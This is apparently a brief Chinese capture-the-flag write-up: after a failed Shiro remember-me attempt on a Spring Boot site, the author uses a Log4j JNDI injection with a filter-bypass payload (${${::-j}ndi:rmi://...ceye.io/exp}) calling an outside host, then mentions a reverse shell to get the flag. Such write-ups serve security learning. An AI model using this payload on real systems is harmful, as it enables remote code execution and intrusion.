浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
jndi被过滤了
进行绕过
${${::-j}ndi:rmi://py2hu7.ceye.io/exp}
成功接收到dnslog信息。
构建jndi反dshell,这里反dshell的命令需要bypass一下
在这里插入代码片
反d的有点慢,但是可以成功反dshell并拿取flag。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)